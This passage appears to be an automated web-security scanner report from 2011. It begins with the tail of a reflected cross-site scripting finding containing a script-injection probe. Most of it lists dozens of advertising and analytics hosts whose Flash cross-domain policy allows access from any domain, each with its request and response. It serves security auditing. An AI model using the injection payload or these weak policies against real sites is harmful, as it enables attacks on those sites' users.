<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascript">
GS_googleAddAdSenseService("ca-pub-8250125438595222");
GS_googleEnableAllServices();
var u_id="d6cc0</script><script>alert(1)</script>8e6a735c675";var gen="";var age="";var zip="";</script>
...[SNIP]...

4. Flash cross-domain policy
There are 41 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://a1.interclick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a1.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 12 Jul 2011 20:41:04 GMT
Accept-Ranges: bytes
ETag: "2d5a54d440cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 21 Jul 2011 19:24:38 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.2. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Thu, 21 Jul 2011 16:13:58 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.3. http://altfarm.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Thu, 21 Jul 2011 19:28:47 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.4. http://analytics.spongecell.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.spongecell.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: analytics.spongecell.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Thu, 21 Jul 2011 19:30:49 GMT
Content-Type: text/xml
Content-Length: 325
Last-Modified: Tue, 22 Mar 2011 01:45:24 GMT
Connection: close
Vary: Accept-Encoding
Expires: Thu, 21 Jul 2011 19:30:48 GMT
Cache-Control: no-cache
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.5. http://api.chartbeat.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.chartbeat.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.chartbeat.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 21 Jul 2011 16:12:57 GMT
Content-Type: text/xml
Content-Length: 342
Last-Modified: Tue, 12 Jul 2011 19:40:15 GMT
Connection: close
Access-Control-Allow-Origin: *
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.6. http://api.facebook.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Sat, 20 Aug 2011 19:22:11 GMT
X-FB-Server: 10.42.14.49
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

4.7. http://cdn.interclick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.interclick.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:31:27 GMT
Server: PWS/1.7.3.3
X-Px: ms iad-agg-n5 ( iad-agg-n25), ht-d iad-agg-n25.panthercdn.com
ETag: "2d5a54d440cc1:0"
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Cache-Control: max-age=604800
Expires: Sun, 24 Jul 2011 12:05:37 GMT
Age: 372350
Content-Length: 225
Content-Type: text/xml
Last-Modified: Tue, 12 Jul 2011 20:41:04 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.8. http://clk.atdmt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Content-Type: text/xml
Date: Thu, 21 Jul 2011 17:36:10 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.9. http://contextlinks.netseer.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://contextlinks.netseer.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: contextlinks.netseer.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"313-1280025612000"
Last-Modified: Sun, 25 Jul 2010 02:40:12 GMT
Content-Type: application/xml
Content-Length: 313
Date: Thu, 21 Jul 2011 19:23:00 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" />
...[SNIP]...

4.10. http://fls.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Wed, 20 Jul 2011 22:25:07 GMT
Expires: Tue, 12 Jul 2011 22:21:58 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 79464
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.11. http://gadgets.justanswer.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gadgets.justanswer.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gadgets.justanswer.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "717e2d35514ddef87be36dea79d4e6e7:1280183599"
Last-Modified: Mon, 26 Jul 2010 22:33:19 GMT
Accept-Ranges: bytes
Content-Length: 485
Content-Type: application/xml
Date: Thu, 21 Jul 2011 19:23:14 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" secure="false" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*" secure="true" to-ports="*"/>
...[SNIP]...

4.12. http://haymarketbusinesspublications.122.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://haymarketbusinesspublications.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: haymarketbusinesspublications.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:05 GMT
Server: Omniture DC/2.0.0
xserver: www403
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.13. http://ic.nexac.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ic.nexac.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ic.nexac.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 12 Jul 2011 20:41:04 GMT
Accept-Ranges: bytes
ETag: "2d5a54d440cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 21 Jul 2011 19:31:46 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.14. http://img.mediaplex.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:23:08 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1b1f-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.15. http://l.5min.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.5min.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.5min.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 02 Nov 2010 13:43:12 GMT
Accept-Ranges: bytes
ETag: "f5e7e9e4937acb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Server: fmv-m02.ehost.aol.com
Date: Thu, 21 Jul 2011 19:24:25 GMT
Connection: keep-alive
Content-Length: 315

...<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.16. http://m.webtrends.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.webtrends.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.webtrends.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:73f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 21 Jul 2011 17:35:35 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.17. http://metrics.apple.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.apple.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 20:25:06 GMT
Server: Omniture DC/2.0.0
xserver: www603
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.18. http://pfiles.5min.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pfiles.5min.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pfiles.5min.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:22:50 GMT
Server: PWS/1.7.3.3
X-Px: ht iad-agg-n34.panthercdn.com
ETag: "6c38932b2bf0ca1:0"
Cache-Control: max-age=31536000
Expires: Wed, 20 Jun 2012 19:38:27 GMT
Age: 2591063
Content-Length: 310
Content-Type: text/xml
Last-Modified: Mon, 10 May 2010 10:25:53 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*" />
...[SNIP]...

4.19. http://pixel.everesttech.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.everesttech.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.everesttech.net

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:29:51 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "5e0288-cb-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 203
Keep-Alive: timeout=15, max=990034
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.20. http://pixel1350.everesttech.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel1350.everesttech.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel1350.everesttech.net

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:22:02 GMT
Server: Apache
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "37f8c15-cb-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 203
Keep-Alive: timeout=15, max=996026
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.21. http://pshared.5min.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pshared.5min.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pshared.5min.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:22:49 GMT
Server: PWS/1.7.3.3
X-Px: ht iad-agg-n27.panthercdn.com
ETag: "031c49ef11acc1:0"
Cache-Control: max-age=604800
Expires: Wed, 27 Jul 2011 10:25:24 GMT
Age: 118645
Content-Length: 315
Content-Type: text/xml
Last-Modified: Wed, 25 May 2011 15:37:14 GMT
Connection: close

...<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.22. http://puma.vizu.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://puma.vizu.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: puma.vizu.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:24:47 GMT
Server: PWS/1.7.3.3
X-Px: ht iad-agg-n29.panthercdn.com
ETag: "9c515-10d-8b2eaf40"
P3P: CP="DSP NID OTP UNR STP NON", policyref="/w3c/p3p.xml"
Cache-Control: max-age=604800
Expires: Sun, 24 Jul 2011 23:38:44 GMT
Age: 330363
Content-Length: 269
Content-Type: text/xml
Last-Modified: Thu, 09 Jun 2011 20:46:13 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-
...[SNIP]...

4.23. http://rad.msn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Fri, 13 May 2011 05:32:00 GMT
Accept-Ranges: bytes
ETag: "088fa142f11cc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Thu, 21 Jul 2011 20:05:09 GMT
Connection: keep-alive
Content-Length: 202

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.24. http://secure-us.imrworldwide.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 16:12:55 GMT
Content-Type: text/xml
Content-Length: 268
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
Connection: close
Expires: Thu, 28 Jul 2011 16:12:55 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

4.25. http://syn.5min.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://syn.5min.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: syn.5min.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 25 May 2011 15:39:52 GMT
Accept-Ranges: bytes
ETag: "014f1fcf11acc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Server: fmv-m06 - syn
Date: Thu, 21 Jul 2011 19:22:47 GMT
Connection: keep-alive
Content-Length: 310

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*" />
...[SNIP]...

4.26. http://web2.checkm8.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://web2.checkm8.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: web2.checkm8.com

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:06 GMT
Server: Apache
P3P: policyref="http://web2.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.22 ny-ad12
ETag: "1311350993"
Last-Modified: Fri, 22-Jul-2011 16:09:53 GMT
Age: 0
Cache-Control: max-age=86400
Content-Length: 106
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0" ?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.27. http://www.righthealth.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.righthealth.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:22:58 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Wed, 15 Sep 2010 16:51:18 GMT
Accept-Ranges: bytes
Content-Length: 101
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:22:58 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992;expires=Thu, 21-Jul-2011 19:37:58 GMT;path=/

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.28. http://community.spiceworks.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.spiceworks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: community.spiceworks.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 17:35:42 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 13 Jul 2011 02:05:00 GMT
ETag: "3d10fb4-cc-4a7e9d800eb00"
Accept-Ranges: bytes
Content-Length: 204
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.dell.com"/>
</cross-domain-pol
...[SNIP]...

4.29. http://disqus.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://disqus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: disqus.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 16:13:30 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Length: 244
Connection: close
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
